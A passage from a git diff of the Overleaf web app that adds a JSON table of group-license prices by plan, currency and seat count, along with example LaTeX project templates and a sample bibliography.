"price_in_cents": 550000, + "additional_license_legacy_price_in_cents": 16500 + }, + "50": { + "price_in_cents": 1375000, + "additional_license_legacy_price_in_cents": 15100 + } + }, + "SEK": { + "2": { + "price_in_cents": 173800, + "additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 260700, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 347600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 434500, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 869000, + "additional_license_legacy_price_in_cents": 56500 + }, + "20": { + "price_in_cents": 1738000, + "additional_license_legacy_price_in_cents": 52100 + }, + "50": { + "price_in_cents": 4345000, + "additional_license_legacy_price_in_cents": 47800 + } + }, + "SGD": { + "2": { + "price_in_cents": 31000, + "additional_license_legacy_price_in_cents": 18100 + }, + "3": { + "price_in_cents": 46500, + "additional_license_legacy_price_in_cents": 18100 + }, + "4": { + "price_in_cents": 62000, + "additional_license_legacy_price_in_cents": 18100 + }, + "5": { + "price_in_cents": 77500, + "additional_license_legacy_price_in_cents": 18100 + }, + "10": { + "price_in_cents": 155000, + "additional_license_legacy_price_in_cents": 10100 + }, + "20": { + "price_in_cents": 310000, + "additional_license_legacy_price_in_cents": 9300 + }, + "50": { + "price_in_cents": 775000, + "additional_license_legacy_price_in_cents": 8500 + } + }, + "USD": { + "2": { + "price_in_cents": 23800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 35700, + "additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 47600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 59500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 119000, + "additional_license_legacy_price_in_cents": 7700 + }, + "20": { + "price_in_cents": 238000, + "additional_license_legacy_price_in_cents": 7100 + }, + "50": { + "price_in_cents": 595000, + "additional_license_legacy_price_in_cents": 6500 + } + } + } + }, + "enterprise": { + "professional": { + "AUD": { + "2": { + "price_in_cents": 82600, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 123900, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 165200, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 206500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 413000, + "additional_license_legacy_price_in_cents": 29800 + }, + "20": { + "price_in_cents": 826000, + "additional_license_legacy_price_in_cents": 27500 + }, + "50": { + "price_in_cents": 2065000, + "additional_license_legacy_price_in_cents": 25200 + } + }, + "BRL": { + "2": { + "price_in_cents": 179800, + "additional_license_legacy_price_in_cents": 69900 + }, + "3": { + "price_in_cents": 269700, + "additional_license_legacy_price_in_cents": 69900 + }, + "4": { + "price_in_cents": 359600, + "additional_license_legacy_price_in_cents": 69900 + }, + "5": { + "price_in_cents": 449500, + "additional_license_legacy_price_in_cents": 69900 + }, + "10": { + "price_in_cents": 899000, + "additional_license_legacy_price_in_cents": 64900 + }, + "20": { + "price_in_cents": 1798000, + "additional_license_legacy_price_in_cents": 59900 + }, + "50": { + "price_in_cents": 4495000, + "additional_license_legacy_price_in_cents": 54900 + } + }, + "CAD": { + "2": { + "price_in_cents": 80800, + "additional_license_legacy_price_in_cents": 31400 + }, + "3": { + "price_in_cents": 121200, + "additional_license_legacy_price_in_cents": 31400 + }, + "4": { + "price_in_cents": 161600, + "additional_license_legacy_price_in_cents": 31400 + }, + "5": { + "price_in_cents": 202000, + "additional_license_legacy_price_in_cents": 31400 + }, + "10": { + "price_in_cents": 404000, + "additional_license_legacy_price_in_cents": 29100 + }, + "20": { + "price_in_cents": 808000, + "additional_license_legacy_price_in_cents": 26900 + }, + "50": { + "price_in_cents": 2020000, + "additional_license_legacy_price_in_cents": 24600 + } + }, + "CHF": { + "2": { + "price_in_cents": 71800, + "additional_license_legacy_price_in_cents": 49900 + }, + "3": { + "price_in_cents": 107700, + "additional_license_legacy_price_in_cents": 49900 + }, + "4": { + "price_in_cents": 143600, + "additional_license_legacy_price_in_cents": 49900 + }, + "5": { + "price_in_cents": 179500, + "additional_license_legacy_price_in_cents": 49900 + }, + "10": { + "price_in_cents": 359000, + "additional_license_legacy_price_in_cents": 25900 + }, + "20": { + "price_in_cents": 718000, + "additional_license_legacy_price_in_cents": 23900 + }, + "50": { + "price_in_cents": 1795000, + "additional_license_legacy_price_in_cents": 21900 + } + }, + "CLP": { + "2": { + "price_in_cents": 43378200, + "additional_license_legacy_price_in_cents": 16869300 + }, + "3": { + "price_in_cents": 65067300, + "additional_license_legacy_price_in_cents": 16869300 + }, + "4": { + "price_in_cents": 86756400, + "additional_license_legacy_price_in_cents": 16869300 + }, + "5": { + "price_in_cents": 108445500, + "additional_license_legacy_price_in_cents": 16869300 + }, + "10": { + "price_in_cents": 216891000, + "additional_license_legacy_price_in_cents": 15664300 + }, + "20": { + "price_in_cents": 433782000, + "additional_license_legacy_price_in_cents": 14459400 + }, + "50": { + "price_in_cents": 1084455000, + "additional_license_legacy_price_in_cents": 13254400 + } + }, + "COP": { + "2": { + "price_in_cents": 142182000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "3": { + "price_in_cents": 213273000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "4": { + "price_in_cents": 284364000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "5": { + "price_in_cents": 355455000, + "additional_license_legacy_price_in_cents": 55293000 + }, + "10": { + "price_in_cents": 710910000, + "additional_license_legacy_price_in_cents": 51343500 + }, + "20": { + "price_in_cents": 1421820000, + "additional_license_legacy_price_in_cents": 47394000 + }, + "50": { + "price_in_cents": 2000000000, + "additional_license_legacy_price_in_cents": 40000000 + } + }, + "DKK": { + "2": { + "price_in_cents": 428200, + "additional_license_legacy_price_in_cents": 166500 + }, + "3": { + "price_in_cents": 642300, + "additional_license_legacy_price_in_cents": 166500 + }, + "4": { + "price_in_cents": 856400, + "additional_license_legacy_price_in_cents": 166500 + }, + "5": { + "price_in_cents": 1070500, + "additional_license_legacy_price_in_cents": 166500 + }, + "10": { + "price_in_cents": 2141000, + "additional_license_legacy_price_in_cents": 154600 + }, + "20": { + "price_in_cents": 4282000, + "additional_license_legacy_price_in_cents": 142700 + }, + "50": { + "price_in_cents": 10705000, + "additional_license_legacy_price_in_cents": 130800 + } + }, + "EUR": { + "2": { + "price_in_cents": 66400, + "additional_license_legacy_price_in_cents": 25800 + }, + "3": { + "price_in_cents": 99600, + "additional_license_legacy_price_in_cents": 25800 + }, + "4": { + "price_in_cents": 132800, + "additional_license_legacy_price_in_cents": 25800 + }, + "5": { + "price_in_cents": 166000, + "additional_license_legacy_price_in_cents": 25800 + }, + "10": { + "price_in_cents": 332000, + "additional_license_legacy_price_in_cents": 23900 + }, + "20": { + "price_in_cents": 664000, + "additional_license_legacy_price_in_cents": 22100 + }, + "50": { + "price_in_cents": 1660000, + "additional_license_legacy_price_in_cents": 20200 + } + }, + "GBP": { + "2": { + "price_in_cents": 57400, + "additional_license_legacy_price_in_cents": 22300 + }, + "3": { + "price_in_cents": 86100, + "additional_license_legacy_price_in_cents": 22300 + }, + "4": { + "price_in_cents": 114800, + "additional_license_legacy_price_in_cents": 22300 + }, + "5": { + "price_in_cents": 143500, + "additional_license_legacy_price_in_cents": 22300 + }, + "10": { + "price_in_cents": 287000, + "additional_license_legacy_price_in_cents": 20700 + }, + "20": { + "price_in_cents": 574000, + "additional_license_legacy_price_in_cents": 19100 + }, + "50": { + "price_in_cents": 1435000, + "additional_license_legacy_price_in_cents": 17500 + } + }, + "INR": { + "2": { + "price_in_cents": 1727800, + "additional_license_legacy_price_in_cents": 671900 + }, + "3": { + "price_in_cents": 2591700, + "additional_license_legacy_price_in_cents": 671900 + }, + "4": { + "price_in_cents": 3455600, + "additional_license_legacy_price_in_cents": 671900 + }, + "5": { + "price_in_cents": 4319500, + "additional_license_legacy_price_in_cents": 671900 + }, + "10": { + "price_in_cents": 8639000, + "additional_license_legacy_price_in_cents": 623900 + }, + "20": { + "price_in_cents": 17278000, + "additional_license_legacy_price_in_cents": 575900 + }, + "50": { + "price_in_cents": 43195000, + "additional_license_legacy_price_in_cents": 527900 + } + }, + "MXN": { + "2": { + "price_in_cents": 1061800, + "additional_license_legacy_price_in_cents": 412900 + }, + "3": { + "price_in_cents": 1592700, + "additional_license_legacy_price_in_cents": 412900 + }, + "4": { + "price_in_cents": 2123600, + "additional_license_legacy_price_in_cents": 412900 + }, + "5": { + "price_in_cents": 2654500, + "additional_license_legacy_price_in_cents": 412900 + }, + "10": { + "price_in_cents": 5309000, + "additional_license_legacy_price_in_cents": 383400 + }, + "20": { + "price_in_cents": 10618000, + "additional_license_legacy_price_in_cents": 353900 + }, + "50": { + "price_in_cents": 26545000, + "additional_license_legacy_price_in_cents": 324400 + } + }, + "NOK": { + "2": { + "price_in_cents": 516400, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 774600, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 1032800, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 1291000, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 2582000, + "additional_license_legacy_price_in_cents": 186400 + }, + "20": { + "price_in_cents": 5164000, + "additional_license_legacy_price_in_cents": 172100 + }, + "50": { + "price_in_cents": 12910000, + "additional_license_legacy_price_in_cents": 157700 + } + }, + "NZD": { + "2": { + "price_in_cents": 82600, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 123900, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 165200, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 206500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 413000, + "additional_license_legacy_price_in_cents": 29800 + }, + "20": { + "price_in_cents": 826000, + "additional_license_legacy_price_in_cents": 27500 + }, + "50": { + "price_in_cents": 2065000, + "additional_license_legacy_price_in_cents": 25200 + } + }, + "PEN": { + "2": { + "price_in_cents": 172600, + "additional_license_legacy_price_in_cents": 67100 + }, + "3": { + "price_in_cents": 258900, + "additional_license_legacy_price_in_cents": 67100 + }, + "4": { + "price_in_cents": 345200, + "additional_license_legacy_price_in_cents": 67100 + }, + "5": { + "price_in_cents": 431500, + "additional_license_legacy_price_in_cents": 67100 + }, + "10": { + "price_in_cents": 863000, + "additional_license_legacy_price_in_cents": 62300 + }, + "20": { + "price_in_cents": 1726000, + "additional_license_legacy_price_in_cents": 57500 + }, + "50": { + "price_in_cents": 4315000, + "additional_license_legacy_price_in_cents": 52700 + } + }, + "SEK": { + "2": { + "price_in_cents": 516400, + "additional_license_legacy_price_in_cents": 200800 + }, + "3": { + "price_in_cents": 774600, + "additional_license_legacy_price_in_cents": 200800 + }, + "4": { + "price_in_cents": 1032800, + "additional_license_legacy_price_in_cents": 200800 + }, + "5": { + "price_in_cents": 1291000, + "additional_license_legacy_price_in_cents": 200800 + }, + "10": { + "price_in_cents": 2582000, + "additional_license_legacy_price_in_cents": 186400 + }, + "20": { + "price_in_cents": 5164000, + "additional_license_legacy_price_in_cents": 172100 + }, + "50": { + "price_in_cents": 12910000, + "additional_license_legacy_price_in_cents": 157700 + } + }, + "SGD": { + "2": { + "price_in_cents": 93400, + "additional_license_legacy_price_in_cents": 36300 + }, + "3": { + "price_in_cents": 140100, + "additional_license_legacy_price_in_cents": 36300 + }, + "4": { + "price_in_cents": 186800, + "additional_license_legacy_price_in_cents": 36300 + }, + "5": { + "price_in_cents": 233500, + "additional_license_legacy_price_in_cents": 36300 + }, + "10": { + "price_in_cents": 467000, + "additional_license_legacy_price_in_cents": 33700 + }, + "20": { + "price_in_cents": 934000, + "additional_license_legacy_price_in_cents": 31100 + }, + "50": { + "price_in_cents": 2335000, + "additional_license_legacy_price_in_cents": 28500 + } + }, + "USD": { + "2": { + "price_in_cents": 71800, + "additional_license_legacy_price_in_cents": 27900 + }, + "3": { + "price_in_cents": 107700, + "additional_license_legacy_price_in_cents": 27900 + }, + "4": { + "price_in_cents": 143600, + "additional_license_legacy_price_in_cents": 27900 + }, + "5": { + "price_in_cents": 179500, + "additional_license_legacy_price_in_cents": 27900 + }, + "10": { + "price_in_cents": 359000, + "additional_license_legacy_price_in_cents": 25900 + }, + "20": { + "price_in_cents": 718000, + "additional_license_legacy_price_in_cents": 23900 + }, + "50": { + "price_in_cents": 1795000, + "additional_license_legacy_price_in_cents": 21900 + } + } + }, + "collaborator": { + "AUD": { + "2": { + "price_in_cents": 43000, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 64500, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 86000, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 107500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 215000, + "additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 430000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1075000, + "additional_license_legacy_price_in_cents": 13100 + } + }, + "BRL": { + "2": { + "price_in_cents": 89800, + "additional_license_legacy_price_in_cents": 34900 + }, + "3": { + "price_in_cents": 134700, + "additional_license_legacy_price_in_cents": 34900 + }, + "4": { + "price_in_cents": 179600, + "additional_license_legacy_price_in_cents": 34900 + }, + "5": { + "price_in_cents": 224500, + "additional_license_legacy_price_in_cents": 34900 + }, + "10": { + "price_in_cents": 449000, + "additional_license_legacy_price_in_cents": 32400 + }, + "20": { + "price_in_cents": 898000, + "additional_license_legacy_price_in_cents": 29900 + }, + "50": { + "price_in_cents": 2245000, + "additional_license_legacy_price_in_cents": 27400 + } + }, + "CAD": { + "2": { + "price_in_cents": 41200, + "additional_license_legacy_price_in_cents": 16000 + }, + "3": { + "price_in_cents": 61800, + "additional_license_legacy_price_in_cents": 16000 + }, + "4": { + "price_in_cents": 82400, + "additional_license_legacy_price_in_cents": 16000 + }, + "5": { + "price_in_cents": 103000, + "additional_license_legacy_price_in_cents": 16000 + }, + "10": { + "price_in_cents": 206000, + "additional_license_legacy_price_in_cents": 14800 + }, + "20": { + "price_in_cents": 412000, + "additional_license_legacy_price_in_cents": 13700 + }, + "50": { + "price_in_cents": 1030000, + "additional_license_legacy_price_in_cents": 12500 + } + }, + "CHF": { + "2": { + "price_in_cents": 35800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 53700, + "additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 71600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 89500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 179000, + "additional_license_legacy_price_in_cents": 12900 + }, + "20": { + "price_in_cents": 358000, + "additional_license_legacy_price_in_cents": 11900 + }, + "50": { + "price_in_cents": 895000, + "additional_license_legacy_price_in_cents": 10900 + } + }, + "CLP": { + "2": { + "price_in_cents": 19978200, + "additional_license_legacy_price_in_cents": 7769300 + }, + "3": { + "price_in_cents": 29967300, + "additional_license_legacy_price_in_cents": 7769300 + }, + "4": { + "price_in_cents": 39956400, + "additional_license_legacy_price_in_cents": 7769300 + }, + "5": { + "price_in_cents": 49945500, + "additional_license_legacy_price_in_cents": 7769300 + }, + "10": { + "price_in_cents": 99891000, + "additional_license_legacy_price_in_cents": 7214300 + }, + "20": { + "price_in_cents": 199782000, + "additional_license_legacy_price_in_cents": 6659400 + }, + "50": { + "price_in_cents": 499455000, + "additional_license_legacy_price_in_cents": 6104400 + } + }, + "COP": { + "2": { + "price_in_cents": 70182000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "3": { + "price_in_cents": 105273000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "4": { + "price_in_cents": 140364000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "5": { + "price_in_cents": 175455000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "10": { + "price_in_cents": 350910000, + "additional_license_legacy_price_in_cents": 25343500 + }, + "20": { + "price_in_cents": 701820000, + "additional_license_legacy_price_in_cents": 23394000 + }, + "50": { + "price_in_cents": 1754550000, + "additional_license_legacy_price_in_cents": 21444500 + } + }, + "DKK": { + "2": { + "price_in_cents": 215800, + "additional_license_legacy_price_in_cents": 83900 + }, + "3": { + "price_in_cents": 323700, + "additional_license_legacy_price_in_cents": 83900 + }, + "4": { + "price_in_cents": 431600, + "additional_license_legacy_price_in_cents": 83900 + }, + "5": { + "price_in_cents": 539500, + "additional_license_legacy_price_in_cents": 83900 + }, + "10": { + "price_in_cents": 1079000, + "additional_license_legacy_price_in_cents": 77900 + }, + "20": { + "price_in_cents": 2158000, + "additional_license_legacy_price_in_cents": 71900 + }, + "50": { + "price_in_cents": 5395000, + "additional_license_legacy_price_in_cents": 65900 + } + }, + "EUR": { + "2": { + "price_in_cents": 32200, + "additional_license_legacy_price_in_cents": 12500 + }, + "3": { + "price_in_cents": 48300, + "additional_license_legacy_price_in_cents": 12500 + }, + "4": { + "price_in_cents": 64400, + "additional_license_legacy_price_in_cents": 12500 + }, + "5": { + "price_in_cents": 80500, + "additional_license_legacy_price_in_cents": 12500 + }, + "10": { + "price_in_cents": 161000, + "additional_license_legacy_price_in_cents": 11600 + }, + "20": { + "price_in_cents": 322000, + "additional_license_legacy_price_in_cents": 10700 + }, + "50": { + "price_in_cents": 805000, + "additional_license_legacy_price_in_cents": 9800 + } + }, + "GBP": { + "2": { + "price_in_cents": 28600, + "additional_license_legacy_price_in_cents": 11100 + }, + "3": { + "price_in_cents": 42900, + "additional_license_legacy_price_in_cents": 11100 + }, + "4": { + "price_in_cents": 57200, + "additional_license_legacy_price_in_cents": 11100 + }, + "5": { + "price_in_cents": 71500, + "additional_license_legacy_price_in_cents": 11100 + }, + "10": { + "price_in_cents": 143000, + "additional_license_legacy_price_in_cents": 10300 + }, + "20": { + "price_in_cents": 286000, + "additional_license_legacy_price_in_cents": 9500 + }, + "50": { + "price_in_cents": 715000, + "additional_license_legacy_price_in_cents": 8700 + } + }, + "INR": { + "2": { + "price_in_cents": 827800, + "additional_license_legacy_price_in_cents": 321900 + }, + "3": { + "price_in_cents": 1241700, + "additional_license_legacy_price_in_cents": 321900 + }, + "4": { + "price_in_cents": 1655600, + "additional_license_legacy_price_in_cents": 321900 + }, + "5": { + "price_in_cents": 2069500, + "additional_license_legacy_price_in_cents": 321900 + }, + "10": { + "price_in_cents": 4139000, + "additional_license_legacy_price_in_cents": 298900 + }, + "20": { + "price_in_cents": 8278000, + "additional_license_legacy_price_in_cents": 275900 + }, + "50": { + "price_in_cents": 20695000, + "additional_license_legacy_price_in_cents": 252900 + } + }, + "MXN": { + "2": { + "price_in_cents": 521800, + "additional_license_legacy_price_in_cents": 202900 + }, + "3": { + "price_in_cents": 782700, + "additional_license_legacy_price_in_cents": 202900 + }, + "4": { + "price_in_cents": 1043600, + "additional_license_legacy_price_in_cents": 202900 + }, + "5": { + "price_in_cents": 1304500, + "additional_license_legacy_price_in_cents": 202900 + }, + "10": { + "price_in_cents": 2609000, + "additional_license_legacy_price_in_cents": 188400 + }, + "20": { + "price_in_cents": 5218000, + "additional_license_legacy_price_in_cents": 173900 + }, + "50": { + "price_in_cents": 13045000, + "additional_license_legacy_price_in_cents": 159400 + } + }, + "NOK": { + "2": { + "price_in_cents": 260800, + "additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 391200, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 521600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 652000, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 1304000, + "additional_license_legacy_price_in_cents": 94100 + }, + "20": { + "price_in_cents": 2608000, + "additional_license_legacy_price_in_cents": 86900 + }, + "50": { + "price_in_cents": 6520000, + "additional_license_legacy_price_in_cents": 79600 + } + }, + "NZD": { + "2": { + "price_in_cents": 43000, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 64500, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 86000, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 107500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 215000, + "additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 430000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1075000, + "additional_license_legacy_price_in_cents": 13100 + } + }, + "PEN": { + "2": { + "price_in_cents": 82600, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 123900, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 165200, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 206500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 413000, + "additional_license_legacy_price_in_cents": 29800 + }, + "20": { + "price_in_cents": 826000, + "additional_license_legacy_price_in_cents": 27500 + }, + "50": { + "price_in_cents": 2065000, + "additional_license_legacy_price_in_cents": 25200 + } + }, + "SEK": { + "2": { + "price_in_cents": 260800, + "additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 391200, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 521600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 652000, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 1304000, + "additional_license_legacy_price_in_cents": 94100 + }, + "20": { + "price_in_cents": 2608000, + "additional_license_legacy_price_in_cents": 86900 + }, + "50": { + "price_in_cents": 6520000, + "additional_license_legacy_price_in_cents": 79600 + } + }, + "SGD": { + "2": { + "price_in_cents": 46600, + "additional_license_legacy_price_in_cents": 18100 + }, + "3": { + "price_in_cents": 69900, + "additional_license_legacy_price_in_cents": 18100 + }, + "4": { + "price_in_cents": 93200, + "additional_license_legacy_price_in_cents": 18100 + }, + "5": { + "price_in_cents": 116500, + "additional_license_legacy_price_in_cents": 18100 + }, + "10": { + "price_in_cents": 233000, + "additional_license_legacy_price_in_cents": 16800 + }, + "20": { + "price_in_cents": 466000, + "additional_license_legacy_price_in_cents": 15500 + }, + "50": { + "price_in_cents": 1165000, + "additional_license_legacy_price_in_cents": 14200 + } + }, + "USD": { + "2": { + "price_in_cents": 35800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 53700, + "additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 71600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 89500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 179000, + "additional_license_legacy_price_in_cents": 12900 + }, + "20": { + "price_in_cents": 358000, + "additional_license_legacy_price_in_cents": 11900 + }, + "50": { + "price_in_cents": 895000, + "additional_license_legacy_price_in_cents": 10900 + } + } + } + } +} diff --git a/services/web/app/templates/project_files/example-project-sp/frog.jpg b/services/web/app/templates/project_files/example-project-sp/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/web/app/templates/project_files/example-project-sp/frog.jpg differ diff --git a/services/web/app/templates/project_files/example-project-sp/main.tex b/services/web/app/templates/project_files/example-project-sp/main.tex new file mode 100644 index 0000000..fd3c032 --- /dev/null +++ b/services/web/app/templates/project_files/example-project-sp/main.tex @@ -0,0 +1,117 @@ +\documentclass{article} + +% Language setting +% Replace `english' with e.g. `spanish' to change the document language +\usepackage[english]{babel} + +% Set page size and margins +% Replace `letterpaper' with `a4paper' for UK/EU standard size +\usepackage[letterpaper,top=2cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry} + +% Useful packages +\usepackage{amsmath} +\usepackage{graphicx} +\usepackage[colorlinks=true, allcolors=blue]{hyperref} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +Your introduction goes here! Simply start writing your document and use the Recompile button to view the updated PDF preview. Examples of commonly used commands and features are listed below, to help you get started. + +Once you're familiar with the editor, you can find various project settings in the Overleaf menu, accessed via the button in the very top left of the editor. + +\section{Some examples to get started} + +\subsection{How to create Sections and Subsections} + +Simply use the section and subsection commands, as in this example document! With Overleaf, all the formatting and numbering is handled automatically according to the template you've chosen. If you're using Rich Text mode, you can also create new section and subsections via the buttons in the editor toolbar. + +\subsection{How to include Figures} + +First you have to upload the image file from your computer using the upload link in the file-tree menu. Then use the includegraphics command to include it in your document. Use the figure environment and the caption command to add a number and a caption to your figure. See the code for Figure \ref{fig:frog} in this section for an example. + +Note that your figure will automatically be placed in the most appropriate place for it, given the surrounding text and taking into account other figures or tables that may be close by. + +\begin{figure} +\centering +\includegraphics[width=0.25\linewidth]{frog.jpg} +\caption{\label{fig:frog}This frog was uploaded via the file-tree menu.} +\end{figure} + +\subsection{How to add Tables} + +Use the table and tabular environments for basic tables --- see Table~\ref{tab:widgets}, for example. + +\begin{table} +\centering +\begin{tabular}{l|r} +Item & Quantity \\\hline +Widgets & 42 \\ +Gadgets & 13 +\end{tabular} +\caption{\label{tab:widgets}An example table.} +\end{table} + +\subsection{How to add Comments and Track Changes} + +Comments can be added to your project by highlighting some text and clicking ``Add comment'' in the top right of the editor pane. To view existing comments, click on the Review menu in the toolbar above. To reply to a comment, click on the Reply button in the lower right corner of the comment. You can close the Review pane by clicking its name on the toolbar when you're done reviewing for the time being. + +Track changes are available on all our premium plans, and can be toggled on or off using the option at the top of the Review pane. Track changes allow you to keep track of every change made to the document, along with the person making the change. + +\subsection{How to add Lists} + +You can make lists with automatic numbering \dots + +\begin{enumerate} +\item Like this, +\item and like this. +\end{enumerate} +\dots or bullet points \dots +\begin{itemize} +\item Like this, +\item and like this. +\end{itemize} + +\subsection{How to write Mathematics} + +\LaTeX{} is great at typesetting mathematics. Let $X_1, X_2, \ldots, X_n$ be a sequence of independent and identically distributed random variables with $\text{E}[X_i] = \mu$ and $\text{Var}[X_i] = \sigma^2 < \infty$, and let +\[S_n = \frac{X_1 + X_2 + \cdots + X_n}{n} + = \frac{1}{n}\sum_{i}^{n} X_i\] +denote their mean. Then as $n$ approaches infinity, the random variables $\sqrt{n}(S_n - \mu)$ converge in distribution to a normal $\mathcal{N}(0, \sigma^2)$. + + +\subsection{How to change the margins and paper size} + +Usually the template you're using will have the page margins and paper size set correctly for that use-case. For example, if you're using a journal article template provided by the journal publisher, that template will be formatted according to their requirements. In these cases, it's best not to alter the margins directly. + +If however you're using a more general template, such as this one, and would like to alter the margins, a common way to do so is via the geometry package. You can find the geometry package loaded in the preamble at the top of this example file. + +\subsection{How to change the document language and spell check settings} + +Overleaf supports many different languages, including multiple different languages within one document. + +To configure the document language, simply edit the option provided to the babel package in the preamble at the top of this example project. + +To change the spell check language, simply open the Overleaf menu at the top left of the editor window, scroll down to the spell check setting, and adjust accordingly. + +\subsection{How to add Citations and a References List} + +You can simply upload a \verb|.bib| file containing your BibTeX entries, created with a tool such as JabRef. You can then cite entries from it, like this: \cite{greenwade93}. Just remember to specify a bibliography style, as well as the filename of the \verb|.bib|. + +\subsection{Good luck!} + +We hope you find Overleaf useful! + +\bibliographystyle{alpha} +\bibliography{sample} + +\end{document} diff --git a/services/web/app/templates/project_files/example-project-sp/sample.bib b/services/web/app/templates/project_files/example-project-sp/sample.bib new file mode 100644 index 0000000..a0e21c7 --- /dev/null +++ b/services/web/app/templates/project_files/example-project-sp/sample.bib @@ -0,0 +1,9 @@ +@article{greenwade93, + author = "George D. Greenwade", + title = "The {C}omprehensive {T}ex {A}rchive {N}etwork ({CTAN})", + year = "1993", + journal = "TUGBoat", + volume = "14", + number = "3", + pages = "342--351" +} diff --git a/services/web/app/templates/project_files/example-project/frog.jpg b/services/web/app/templates/project_files/example-project/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/web/app/templates/project_files/example-project/frog.jpg differ diff --git a/services/web/app/templates/project_files/example-project/main.tex b/services/web/app/templates/project_files/example-project/main.tex new file mode 100644 index 0000000..5199b66 --- /dev/null +++ b/services/web/app/templates/project_files/example-project/main.tex @@ -0,0 +1,119 @@ +\documentclass{article} + +% Language setting +% Replace `english' with e.g. `spanish' to change the document language +\usepackage[english]{babel} + +% Set page size and margins +% Replace `letterpaper' with `a4paper' for UK/EU standard size +\usepackage[letterpaper,top=2cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry} + +% Useful packages +\usepackage{amsmath} +\usepackage{graphicx} +\usepackage[colorlinks=true, allcolors=blue]{hyperref} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +Your introduction goes here! Simply start writing your document and use the Recompile button to view the updated PDF preview. Examples of commonly used commands and features are listed below, to help you get started. + +Once you're familiar with the editor, you can find various project settings in the Overleaf menu, accessed via the button in the very top left of the editor. To view tutorials, user guides, and further documentation, please visit our \href{https://www.overleaf.com/learn}{help library}, or head to our plans page to \href{https://www.overleaf.com/user/subscription/plans}{choose your plan}. + +\section{Some examples to get started} + +\subsection{How to create Sections and Subsections} + +Simply use the section and subsection commands, as in this example document! With Overleaf, all the formatting and numbering is handled automatically according to the template you've chosen. If you're using the Visual Editor, you can also create new section and subsections via the buttons in the editor toolbar. + +\subsection{How to include Figures} + +First you have to upload the image file from your computer using the upload link in the file-tree menu. Then use the includegraphics command to include it in your 